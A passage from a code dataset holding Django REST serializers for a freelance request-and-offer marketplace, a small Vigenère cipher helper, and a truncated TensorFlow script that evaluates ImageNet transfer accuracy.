ListRequestSerializer(DocumentSerializer):\n client = serializers.StringRelatedField()\n partner = serializers.StringRelatedField()\n know_fields = serializers.StringRelatedField(many=True)\n status_display = serializers.SerializerMethodField()\n your_offer = serializers.SerializerMethodField()\n offers_count = serializers.SerializerMethodField()\n new_messages = serializers.SerializerMethodField()\n new_offers = serializers.ReadOnlyField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'client', 'partner',\n 'status', 'status_display', 'offers_count', 'your_offer', \n 'date_promise', 'date_created', 'new_messages', 'new_offers', )\n\n def get_field_names(self, declared_fields, info):\n fields = super().get_field_names(declared_fields, info)\n profile_type = self.context['request'].query_params.get('profile', 'client')\n\n if 'partner' in profile_type:\n fields_to_delete = {'partner', 'round_partners', 'offers_count', 'new_offers'}\n else:\n fields_to_delete = {'client', 'your_offer'}\n\n return list(set(fields) - fields_to_delete)\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def get_your_offer(self, obj):\n account = self.context['request'].user\n round_partner = obj.round_partners.get(partner=account.partner_profile)\n if round_partner.date_response and not round_partner.rejected:\n return True\n return False\n\n def get_offers_count(self, obj):\n return obj.round_partners.exclude(price=None).count()\n\n def get_new_messages(self, obj):\n account = self.context['request'].user\n return obj.new_messages(account)\n\n\nclass OfferSerializer(EmbeddedDocumentSerializer):\n\n class Meta:\n model = RoundPartner\n fields = 
('requisites', 'description', 'duration', 'price',\n 'date_response', 'last_activity')\n extra_kwargs = {\n 'description': {'required': True},\n 'price': {'required': True, 'min_value': 20, \"error_messages\":\n {\"min_value\": \"El costo de la propuesta debe ser mayor o igual a 20.\"}},\n 'date_response': {'read_only': True},\n 'last_activity': {'read_only': True},\n }\n\n\nclass TimeExtensionSerializer(EmbeddedDocumentSerializer):\n\n class Meta:\n model = TimeExtension\n fields = ('duration', 'excuse', 'approve', \n 'date_created', 'date_closed')\n read_only_fields = ('date_created', 'date_closed', )\n\n def validate(self, data):\n now = dt.datetime.now()\n owner = self.context['request'].user\n\n if owner.partner_profile == self.instance.partner:\n if self.instance.time_extensions.count() >= 2:\n raise ValidationError({\n 'message':_('La prórroga solicitada no procede.')})\n\n if not 'duration' in data or not 'excuse' in data:\n raise ValidationError({\n 'duration': self.error_messages['required'],\n 'excuse': self.error_messages['required'],\n })\n\n if self.instance.date_promise < now + dt.timedelta(hours=48):\n raise ValidationError({\n 'message':_(\"Se ha vencido el plazo para solicitar extensiones de tiempo.\")})\n\n duration = self.instance.round_partners.get(partner=self.instance.partner).duration\n if data['duration'] > duration / 2:\n raise ValidationError({\n 'message': _('No puede solicitar mas tiempo que la mitad de la duración de su propuesta.'),\n 'max_duration': str(duration / 2)})\n\n if self.instance.time_extensions.count() == 0:\n return {\n 'duration': data['duration'],\n 'excuse': data['excuse'],\n 'approve': True,\n 'date_created': now,\n 'date_closed': now,\n }\n else:\n return {\n 'duration': data['duration'],\n 'excuse': data['excuse'],\n 'approve': None,\n 'date_created': now,\n }\n\n elif owner.client_profile == self.instance.client:\n if self.instance.time_extensions.count() >= 2:\n if not 'approve' in data:\n raise ValidationError({\n 'approve': self.error_messages['required'],\n })\n\n if self.instance.time_extensions[-1].approve is None:\n return {\n 'approve': data['approve'],\n 'date_closed': now,\n }\n\n raise ValidationError({\n 'message':_('No tiene extensiones de tiempo por aprobar.')})\n\n else:\n raise ValidationError({'message':_('No está asociado a este requerimiento.')})\n\n def update(self, instance, validated_data):\n owner = self.context['request'].user\n\n if owner.partner_profile == self.instance.partner:\n extension = TimeExtension(**validated_data)\n instance.modify(push__time_extensions=extension)\n\n self.instance.client.account.send_message(context={'request': self.instance},\n data={'request_id': str(self.instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['extension_requested'])\n\n else:\n extension = instance.time_extensions[-1]\n extension.approve = validated_data['approve']\n extension.date_closed = validated_data['date_closed']\n instance.modify(pop__time_extensions=1)\n instance.modify(push__time_extensions=extension)\n\n if extension.approve == True:\n promise = functools.reduce(lambda x,y: x+y, [\n instance.date_started, \n instance.round_partners.get(partner=instance.partner).duration, \n *[item.duration for item in instance.time_extensions]\n ])\n instance.modify(date_promise=promise)\n\n # Send notification telling that the extension was aproved\n self.instance.partner.account.send_message(\n data={'request_id': str(self.instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['extension_approved'])\n else:\n # Send 
notification telling that the extension was rejected\n self.instance.partner.account.send_message(\n data={'request_id': str(self.instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['extension_rejected'])\n\n return extension\n\n\nclass SendMessageSerializer(DocumentSerializer):\n content = fields.CharField(max_length=5000, write_only=True)\n type = fields.ChoiceField(choices=Message.TYPE_CHOICES, \n default=Message.TYPE_TEXT, write_only=True, required=False)\n attachment = fields.FileField(max_length=None, use_url=True, \n write_only=True, required=False, validators=[file_max_size])\n last_delivery = fields.BooleanField(write_only=True, default=False)\n reference_ts = fields.FloatField(write_only=True, default=None)\n\n client = fields.CharField(read_only=True, source='client.account.get_full_name')\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n questions = MessageSerializer(read_only=True, many=True)\n com_channel = MessageSerializer(read_only=True, many=True)\n status_display = serializers.SerializerMethodField()\n\n class Meta:\n model = Request\n fields = ('client', 'know_fields', 'questions', 'com_channel',\n 'status_display', 'content', 'type', 'attachment', \n 'last_delivery', 'reference_ts', 'status', )\n read_only_fields = ('client', 'know_fields', 'questions',\n 'com_channel', 'status_display', 'status', )\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment', mimetype_field='type')\n ]\n\n def get_status_display(self, instance):\n return instance.get_status_display()\n\n def validate(self, data):\n\n if data['reference_ts'] is not None:\n try:\n reference_ts = dt.datetime.fromtimestamp(float(data['reference_ts']))\n except:\n raise ValidationError(_('Debe pasar reference_ts en el formato timestamp.'))\n\n if not self.instance.questions.filter(ts=reference_ts) and \\\n not self.instance.com_channel.filter(ts=reference_ts):\n raise ValidationError(_('No existe un mensaje con ese reference_ts.'))\n\n if self.instance.questions.filter(reference_ts=reference_ts) or \\\n self.instance.com_channel.filter(reference_ts=reference_ts):\n raise ValidationError(_('Este mensaje ya ha sido respondido.'))\n\n data['reference_ts'] = reference_ts\n\n if data['type'] == Message.TYPE_TEXT:\n data.pop('attachment', None)\n\n if not data.get('content'):\n raise ValidationError(\n {'content': _('El mensaje no tiene contenido.')}\n )\n\n else:\n # data.pop('content', None)\n attachment = data.get('attachment')\n\n if not attachment:\n raise ValidationError(\n {'attachment': _('El mensaje no tiene archivo adjunto.')}\n )\n\n return data\n\n def update(self, instance, validated_data):\n message = Message(ts=dt.datetime.now(),\n owner=self.context['request'].user, **validated_data)\n\n if message.type != Message.TYPE_TEXT:\n message.attachment.save(message.attachment.name, \n message.attachment, save=False)\n\n if instance.status == Request.STATUS_TODO:\n instance.modify(push__questions=message)\n # Get round partner info if exists\n is_round_partner, round_partner = self.get_round_partner(instance)\n # Update last activity if it is round partner\n if is_round_partner:\n round_partner.last_activity = dt.datetime.now()\n round_partner.save()\n # Send notifications to all round partner but the sender\n notify_round_partners = [rp for rp in instance.round_partners if rp is not round_partner]\n # Send message to each partner\n for rp in notify_round_partners:\n rp.partner.account.send_message(context={'request': instance},\n 
data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['have_new_message'])\n else:\n instance.modify(push__com_channel=message)\n # Send message to partner\n instance.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['have_new_message'])\n\n # Send message to client\n instance.client.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['have_new_message'])\n\n return instance\n\n # Returns True if user is round partner\n def get_round_partner(self, instance):\n # Get round partners\n round_partners = instance.round_partners\n # Check if user is round Partner\n try:\n # Returns round partner index\n round_partner_index = [round_partner.partner.account.paypal_email for round_partner in round_partners].index(self.context['request'].user)\n is_round_partner = True\n round_partner = round_partners[round_partner_index]\n except:\n # If index search throws an exception, \n is_round_partner = False\n round_partner = None\n # Return if exists and round partner\n return (is_round_partner, round_partner)\n\n\nclass PaymentTokenSerializer(DocumentSerializer):\n payment_token = serializers.SerializerMethodField()\n bill = serializers.SerializerMethodField()\n status_display = serializers.SerializerMethodField()\n interface = fields.ChoiceField(required=False,\n choices=Transaction.INTERFACE_CHOICES)\n\n class Meta:\n model = Request\n fields = ('status_display', 'status', 'partner',\n 'payment_token', 'bill', 'interface', )\n extra_kwargs = {\n 'partner': {'required': False, 'write_only': True},\n }\n\n def validate(self, data):\n if self.instance.status == Request.STATUS_TODO:\n if data.get('partner') is None:\n raise ValidationError({'partner': self.error_messages['required']})\n\n round_partner = self.instance.round_partners.get(partner=data.get('partner'))\n if not round_partner.price:\n raise ValidationError(_('El socio seleccionado no ha establecido su propuesta.'))\n\n return {'round_partner': round_partner, 'interface': data.get('interface', 'bypass')}\n\n else:\n return {'interface': self.instance.transactions[0].interface}\n\n def get_bill(self, instance):\n return instance.calculate_bill(\n self.validated_data.get('round_partner'),\n self.validated_data.get('interface'))\n\n def get_payment_token(self, instance):\n bill = self.get_bill(instance)\n payment_interface = get_interface(\n self.validated_data.get('interface'))\n return payment_interface.generate_token(amount=bill['to_pay'])\n\n def get_status_display(self, instance):\n return instance.get_status_display()\n\n\nclass RejectRequestSerializer(DocumentSerializer):\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n status_display = serializers.SerializerMethodField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def save(self, **kwargs):\n partner = self.context['request'].user.partner_profile\n self.instance.round_partners.filter(partner=partner) \\\n .update(rejected=True, date_response=dt.datetime.now())\n\n partner.modify(pull__requests_todo=self.instance, \n push__requests_rejected=self.instance)\n\n ## TODO: pendiente enviar request a otro round partner\n self.instance.save()\n 
return self.instance\n\nclass CancelRequestSerializer(DocumentSerializer):\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n status_display = serializers.SerializerMethodField()\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def save(self, **kwargs):\n self.instance.refund()\n\n self.instance.partner.modify(pull__requests_in_progress=self.instance,\n push__requests_canceled=self.instance)\n self.instance.client.modify(pull__requests_in_progress=self.instance,\n push__requests_canceled=self.instance, last_activity=dt.datetime.now())\n self.instance.modify(status=Request.STATUS_CANCELED, date_canceled=dt.datetime.now())\n\n Bill.make_bill(self.instance)\n\n # Send notification to the partner, client has canceled the request\n self.instance.partner.account.send_message(context={'request': self.instance},\n data={'request_id': str(self.instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['client_cancel_request'])\n\n return self.instance\n\n\nclass AcceptOfferSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n payment_id = fields.CharField(write_only=True)\n payer_id = fields.CharField(write_only=True)\n interface = fields.ChoiceField(default='bypass',\n choices=Transaction.INTERFACE_CHOICES)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'partner', 'payment_id', 'payer_id', 'interface', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def validate(self, data):\n round_partner = self.instance.round_partners.get(partner=data.get('partner'))\n if not round_partner.price:\n raise ValidationError(\n _('El socio seleccionado no ha establecido su propuesta.'))\n bill = self.instance.calculate_bill(round_partner, data.get('interface'))\n\n try:\n transaction = Transaction.make_transaction(bill['to_pay'], \n Transaction.OP_REQUEST_PAYMENT, self.context['request'].user, \n payment_id=data.get('payment_id'), payer_id=data.get('payer_id'),\n interface=data.get('interface'), item=self.instance)\n\n except ContextInterfaceError as err:\n raise ValidationError({'interface': err})\n\n now = dt.datetime.now()\n validated_data = {\n 'status': Request.STATUS_IN_PROGRESS, \n 'price': round_partner.price,\n 'sponsor_percent': bill['sponsor_percent'],\n 'partner': round_partner.partner, \n 'date_started': now,\n 'date_promise': now + round_partner.duration,\n 'transaction': transaction\n }\n\n return validated_data\n\n def update(self, instance, validated_data):\n transaction = validated_data.pop('transaction')\n\n instance = super().update(instance, validated_data)\n instance.modify(push__transactions=transaction)\n\n instance.client.modify(pull__requests_todo=instance,\n push__requests_in_progress=instance, last_activity=dt.datetime.now())\n\n for round_partner in instance.round_partners.filter(rejected=False):\n if round_partner.partner == instance.partner:\n round_partner.partner.modify(pull__requests_todo=instance,\n push__requests_in_progress=instance)\n # Send notification to selected partner\n instance.partner.account.send_message(context={'request': 
instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['were_selected'])\n else:\n round_partner.partner.modify(pull__requests_todo=instance,\n push__requests_rejected=instance)\n # Send notification to rejected partner\n round_partner.partner.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'partner'},\n **PARTNER_MESSAGES['were_rejected'])\n\n # instance.save()\n return instance\n\n\nclass SubmitRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n attachment = fields.FileField(max_length=None, use_url=True, required=True,\n write_only=True, validators=[file_max_size])\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'attachment', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n validators = [\n FileMimetypeValidator(options=Message.CONTENT_TYPES,\n field='attachment')\n ]\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def update(self, instance, validated_data):\n attachment = validated_data.pop('attachment', None)\n extra = {}\n\n if attachment:\n _type = Message.TYPE_DOC if attachment.content_type in Message.CONTENT_TYPES[\n Message.TYPE_DOC] else Message.TYPE_IMAGE\n message = Message(ts=dt.datetime.now(), owner=self.context['request'].user,\n attachment=attachment, type=_type, last_delivery=True,\n content='Recibo del socio.')\n\n message.attachment.save(message.attachment.name, \n message.attachment, save=False)\n extra['push__com_channel'] = message\n\n instance.modify(status=Request.STATUS_DELIVERED, \n date_delivered=dt.datetime.now(), **extra)\n instance.client.account.send_message(context={'request': instance},\n data={'request_id': str(instance.id), 'profile': 'client'},\n **CLIENT_MESSAGES['request_delivered'])\n return instance\n\n\nclass ReceiveRequestSerializer(DocumentSerializer):\n status_display = serializers.SerializerMethodField()\n know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n payment_id = fields.CharField(write_only=True)\n payer_id = fields.CharField(write_only=True)\n\n class Meta:\n model = Request\n fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n 'payment_id', 'payer_id', )\n read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n def get_status_display(self, obj):\n return obj.get_status_display()\n\n def validate(self, data):\n amount = self.instance.calculate_bill()['to_pay']\n ## TODO: Evaluar los descuentos por incumplimiento.\n\n # Compara en caso de que exista una penalizacion por el 40% restante\n if amount > 0:\n try:\n transaction = Transaction.make_transaction(amount,\n Transaction.OP_REQUEST_PAYMENT, self.context['request'].user, \n payment_id=data.get('payment_id'), payer_id=data.get('payer_id'),\n interface=self.instance.transactions[0].interface, item=self.instance)\n \n except ContextInterfaceError as err:\n raise ValidationError({'interface': err})\n else:\n transaction = []\n\n validated_data = {\n 'status': Request.STATUS_PENDING,\n 'transaction': transaction\n }\n\n return validated_data\n\n def update(self, instance, validated_data):\n transaction = validated_data.pop('transaction')\n\n instance = super().update(instance, validated_data)\n instance.modify(push__transactions=transaction)\n\n return 
instance\n\n\nclass UnsatisfiedRequestSerializer(DocumentSerializer):\n    status_display = serializers.SerializerMethodField()\n    know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n    cause = fields.CharField(required=True, write_only=True)\n\n    class Meta:\n        model = Request\n        fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n            'cause', )\n        read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n    def get_status_display(self, obj):\n        return obj.get_status_display()\n\n    def validate(self, data):\n\n        if self.instance.date_unsatisfied:\n            raise ValidationError(\n                {'message':_('Ya ha reportado que está insatisfecho.')})\n\n        return data\n\n    def update(self, instance, validated_data):\n        time_extension = instance.round_partners.get(\n            partner=instance.partner).duration / 4\n\n        message = Message(ts=dt.datetime.now(),\n            owner=self.context['request'].user, content=validated_data['cause'])\n\n        instance.modify(status=Request.STATUS_UNSATISFIED,\n            date_unsatisfied=dt.datetime.now() + time_extension,\n            push__com_channel=message)\n\n        ## TODO: add a task that periodically reviews unsatisfied requests and performs the refund\n\n        # Send Message, the request was marked as unsatisfied\n        instance.partner.account.send_message(context={'request': instance},\n            data={'request_id': str(instance.id), 'profile': 'partner'},\n            **PARTNER_MESSAGES['request_unsatisfied'])\n\n        return instance\n\n\nclass CloseRequestSerializer(DocumentSerializer):\n    status_display = serializers.SerializerMethodField()\n    know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n    class Meta:\n        model = Request\n        fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created', )\n        read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created', )\n\n    def get_status_display(self, obj):\n        return obj.get_status_display()\n\n    def save(self, **kwargs):\n        self.instance.close()\n\n        ## TODO: Send an email with the asilinks invoice\n        return self.instance\n\n\nclass ReviewRequestSerializer(DocumentSerializer):\n    status_display = serializers.SerializerMethodField()\n    know_fields = serializers.StringRelatedField(read_only=True, many=True)\n\n    score = serializers.IntegerField(min_value=1, max_value=10, write_only=True, required=True)\n    comments = serializers.CharField(write_only=True, required=True)\n\n    class Meta:\n        model = Request\n        fields = ('id', 'name', 'know_fields', 'status', 'status_display', 'date_created',\n            'score', 'comments', 'client_review', 'partner_review', )\n        read_only_fields = ('id', 'name', 'know_fields', 'status', 'date_created',\n            'client_review', 'partner_review', )\n        depth = 2\n\n    def get_status_display(self, obj):\n        return obj.get_status_display()\n\n    def validate(self, data):\n        owner = self.context['request'].user\n        if owner.client_profile == self.instance.client:\n            if self.instance.partner_review is not None:\n                raise ValidationError(\n                    {'message':_('Ya ha calificado en este requerimiento.')})\n\n        elif owner.partner_profile == self.instance.partner:\n            if self.instance.client_review is not None:\n                raise ValidationError(\n                    {'message':_('Ya ha calificado en este requerimiento.')})\n\n        else:\n            raise ValidationError({'message':_('No está asociado a este requerimiento.')})\n\n        return data\n\n    def update(self, instance, validated_data):\n        owner = self.context['request'].user\n        review = Review(**validated_data)\n\n        if owner.client_profile == self.instance.client:\n            instance.modify(partner_review=review)\n            
instance.client.update_rating()\n            instance.partner.account.send_message(context={'request': instance},\n                data={'request_id': str(instance.id), 'profile': 'partner'},\n                **PARTNER_MESSAGES['were_qualified'])\n\n        elif owner.partner_profile == self.instance.partner:\n            instance.modify(client_review=review)\n            instance.partner.update_rating()\n            instance.client.account.send_message(context={'request': instance},\n                data={'request_id': str(instance.id), 'profile': 'client'},\n                **CLIENT_MESSAGES['were_qualified'])\n\n        return instance\n\n\nclass RequestStatisticsSerializer(serializers.Serializer):\n    requests_counts = serializers.SerializerMethodField()\n\n    def get_requests_counts(self, instance):\n        return {\n            'todo': len(instance.requests_todo),\n            'draft': len(getattr(instance, 'requests_draft', [])),\n            'in_progress': len(instance.requests_in_progress),\n            'done': len(instance.requests_done),\n            'canceled': len(instance.requests_canceled),\n        }\n","sub_path":"asilinks/requesting/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":41215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"93708201","text":"import files\n\n\n# Vigenère cipher\ndef function(a, b, c, d):\n    j = 0\n    for i in range(0, len(a)):\n        if j == len(b):\n            j = 0\n        c[i] += d(a[i], b[j])\n        j += 1\n\n\ndef main(result, l, n):\n    a = result\n    b = files.input_file(n.key_Vigenere)\n    c = [0] * len(a)\n    function(a, b, c, l)  # c is the encrypted message\n    return c","sub_path":"vigenere.py","file_name":"vigenere.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"109040912","text":"'''\n    Name: extract.py\n    Desc: Extract losses.\n    Usage:\n        python encode_inputs.py /path/to/cfgdir/ --gpu gpu_id\n'''\nfrom __future__ import absolute_import, division, print_function\n\nimport argparse\nimport os\nimport numpy as np\nimport pdb\nimport pickle\nfrom runstats import Statistics\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport threading\nimport time\n\nimport init_paths\nfrom data.load_ops import resize_rescale_image\nfrom data.load_ops import class_1000_imagenet\nfrom data.load_ops import class_selected_imagenet\nfrom data.task_data_loading import load_and_specify_preprocessors_for_representation_extraction\nimport general_utils\nfrom general_utils import RuntimeDeterminedEnviromentVars\nimport models.architectures as architectures\nfrom models.sample_models import *\nimport utils\n\nparser = argparse.ArgumentParser(description='Extract accuracy for a transfer to class 1000 on ImageNet')\nparser.add_argument( '--cfg_dir', dest='cfg_dir', help='directory containing config.py file, should include a checkpoint directory' )\nparser.set_defaults(cfg_dir=\"/home/ubuntu/task-taxonomy-331b/experiments\")\n\nparser.add_argument('--gpu', dest='gpu_id',\n                    help='GPU device id to use [0]',\n                    type=int)\nparser.add_argument('--nopause', dest='nopause', action='store_true')\nparser.set_defaults(nopause=True)\n\nparser.add_argument('--selected', dest='is_selected', action='store_true')\nparser.set_defaults(is_selected=False)\n\nparser.add_argument('--transfer', dest='pretrain_transfer', action='store_true')\nparser.set_defaults(pretrain_transfer=False)\n\nparser.add_argument('--transfer-type', dest='pretrain_transfer_type')\nparser.set_defaults(pretrain_transfer_type='full_taskonomy_beta1/DO_NOT_REPLACE_TARGET_DECODER/16k')\n\nparser.add_argument('--task', 
dest='task')\n\nparser.add_argument('--data-split', dest='data_split')\nparser.set_defaults(data_split=\"val\" )\n\nparser.add_argument('--out-dir', dest='out_dir')\nparser.set_defaults(out_dir=\"\")\n\nparser.add_argument('--out-name', dest='out_name')\nparser.set_defaults(out_name=\"\")\n\nparser.add_argument('--representation-task', dest='representation_task')\nparser.set_defaults(representation_task=\"\")\n\nparser.add_argument('--print-every', dest='print_every')\nparser.set_defaults(print_every=\"10\")\n\nparser.add_argument('--from-scratch', dest='from_scratch', action='store_true')\nparser.set_defaults(from_scratch=False)\n\nparser.add_argument('--train-mode', dest='train_mode', action='store_true')\n# parser.set_defaults(print_every=\"100\")\n\n# TRAIN_MODE =True \ndef main( _ ):\n args = parser.parse_args()\n global TRAIN_MODE\n TRAIN_MODE = args.train_mode\n #task_list = [\"autoencoder\", \"colorization\",\"curvature\", \"denoise\", \"edge2d\", \"edge3d\", \"ego_motion\", \"fix_pose\", \"impainting\", \"jigsaw\", \"keypoint2d\", \"keypoint3d\", \"non_fixated_pose\", \"point_match\", \"reshade\", \"rgb2depth\", \"rgb2mist\", \"rgb2sfnorm\", \"room_layout\", \"segment25d\", \"segment2d\", \"vanishing_point\"]\n #single channel for colorization !!!!!!!!!!!!!!!!!!!!!!!!! COME BACK TO THIS !!!!!!!!!!!!!!!!!!!!!!!!!!!\n task_list = [ args.task ]\n\n # Get available GPUs\n local_device_protos = utils.get_available_devices()\n print( 'Found devices:', [ x.name for x in local_device_protos ] ) \n # set GPU id\n if args.gpu_id:\n print( 'using gpu %d' % args.gpu_id )\n os.environ[ 'CUDA_VISIBLE_DEVICES' ] = str( args.gpu_id )\n else:\n print( 'no gpu specified' )\n \n for task in task_list:\n if args.is_selected:\n to_task = 'class_selected'\n target_loading_fn = class_selected_imagenet\n else:\n to_task = 'class_1000'\n target_loading_fn = class_1000_imagenet\n if args.pretrain_transfer:\n task_dir = os.path.join(args.cfg_dir, args.pretrain_transfer_type, \"{}__{}__8__unlocked\".format(task, to_task))\n else:\n task_dir = os.path.join(args.cfg_dir, 'final', task)\n cfg = utils.load_config( task_dir, nopause=args.nopause )\n \n root_dir = cfg['root_dir']\n if args.is_selected:\n split_file = os.path.abspath( os.path.join( root_dir, 'assets/aws_data/val_selected_imagenet_info.pkl') )\n else:\n split_file = os.path.abspath( os.path.join( root_dir, 'assets/aws_data/val_split_imagenet_info.pkl') )\n cfg['dataset_dir'] = '/home/ubuntu/imagenet'\n\n cfg['train_filenames'] = split_file\n cfg['val_filenames'] = split_file\n cfg['test_filenames'] = split_file \n\n if 'train_list_of_fileinfos' in cfg:\n split_file_ = os.path.join(\n cfg['input_cfg']['log_root'], task,\n '{task}_val_imagenet_representations.pkl'.format( task=task ))\n cfg['train_representations_file'] = split_file_\n cfg['val_representations_file'] = split_file_\n cfg['test_representations_file'] = split_file_\n\n split_file_ = os.path.join(root_dir, 'assets/aws_data/val_imagenet.npy')\n cfg['train_list_of_fileinfos'] = split_file_\n cfg['val_list_of_fileinfos'] = split_file_\n cfg['test_list_of_fileinfos'] = split_file_\n\n # cfg['resize_interpolation_order'] = 0\n # if cfg['model_path'] is None:\n # cfg['model_path'] = os.path.join(cfg['dataset_dir'], \"model_log\", task, \"model.permanent-ckpt\") \n cfg['target_from_filenames'] = target_loading_fn\n # Try latest checkpoint by epoch\n cfg['model_path'] = tf.train.latest_checkpoint(\n os.path.join(\n cfg['log_root'],\n 'logs',\n 'slim-train'\n ))\n\n # Try latest checkpoint by 
time\n if cfg['model_path'] is None:\n cfg['model_path'] = tf.train.latest_checkpoint(\n os.path.join(\n cfg['log_root'],\n 'logs',\n 'slim-train',\n 'time'\n )) \n \n # Try to get one saved manually\n if cfg['model_path'] is None: \n cfg['model_path'] = os.path.join(cfg['log_root'], task, \"model.permanent-ckpt\") \n # cfg['model_path'] = os.path.join(cfg['log_root'], 'logs', 'slim-train', 'time', \"model.ckpt-1350\") \n\n finetuned=True\n if finetuned:\n cfg['model_path'] = os.path.join(cfg['log_root'], task, \"imagenet_scratch\") \n\n cfg['randomize'] = False\n cfg['num_epochs'] = 3\n cfg['batch_size'] = 32 if TRAIN_MODE else 1\n cfg['num_read_threads'] = 3\n if 'batch_size' in cfg['encoder_kwargs']:\n cfg['encoder_kwargs']['batch_size'] = cfg['batch_size']\n try:\n cfg['target_cfg']['batch_size'] = cfg['batch_size']\n except:\n pass\n try:\n cfg['target_cfg']['encoder_kwargs']['batch_size'] = cfg['batch_size']\n except:\n pass\n\n loss_dir = args.cfg_dir\n cfg['finetune_encoder_imagenet'] = True\n cfg['data_used'] = 100000000\n cfg['input_cfg']['num_input'] = 1\n run_extract_losses( args, cfg, loss_dir, task )\n\n\ndef run_extract_losses( args, cfg, save_dir, given_task ):\n transfer = (cfg['model_type'] == architectures.TransferNet)\n if transfer:\n get_data_prefetch_threads_init_fn = utils.get_data_prefetch_threads_init_fn_transfer_imagenet\n setup_input_fn = utils.setup_input_transfer_imagenet\n else:\n setup_input_fn = utils.setup_input\n get_data_prefetch_threads_init_fn = utils.get_data_prefetch_threads_init_fn\n\n # set up logging\n tf.logging.set_verbosity( tf.logging.ERROR )\n stats = Statistics()\n top5_stats = Statistics()\n print_every = int(args.print_every)\n\n with tf.Graph().as_default() as g:\n # create ops and placeholders\n inputs = setup_input_fn( cfg, is_training=False, use_filename_queue=False )\n #RuntimeDeterminedEnviromentVars.load_dynamic_variables( inputs, cfg )\n #RuntimeDeterminedEnviromentVars.populate_registered_variables()\n max_steps = get_max_steps(inputs[ 'max_steps' ], args.data_split)\n\n # build model (and losses and train_op)\n model = utils.setup_model( inputs, cfg, is_training=False )\n\n # set up metrics to evaluate\n names_to_values, names_to_updates = setup_metrics( inputs, model, cfg )\n\n # execute training \n start_time = time.time()\n utils.print_start_info( cfg, max_steps, is_training=False )\n\n # start session and restore model\n training_runners = { 'sess': tf.Session(), 'coord': tf.train.Coordinator() }\n try:\n if cfg['model_path'] is None:\n print('Please specify a checkpoint directory')\n return\t\n print('Attention, model_path is ', cfg['model_path']) \n model[ 'saver_op' ].restore( training_runners[ 'sess' ], cfg[ 'model_path' ] )\n\n # var = [v for v in tf.global_variables() if 'decoder' in v.name][0]\n # print(training_runners[ 'sess' ].run(var))\n\n utils.print_start_info( cfg, max_steps, is_training=False )\n data_prefetch_init_fn = get_data_prefetch_threads_init_fn( inputs, cfg, \n is_training=False, use_filename_queue=False )\n prefetch_threads = threading.Thread(\n target=data_prefetch_init_fn,\n args=( training_runners[ 'sess' ], training_runners[ 'coord' ] ))\n prefetch_threads.start()\n \n # run one example so that we can calculate some statistics about the representations\n filenames = []\n accuracies = []\n if transfer:\n accuracy_op = model['model'].decoder.accuracy\n final_output = model['model'].decoder.final_output \n else:\n accuracy_op = model['model'].accuracy\n final_output = model['model'].final_output \n 
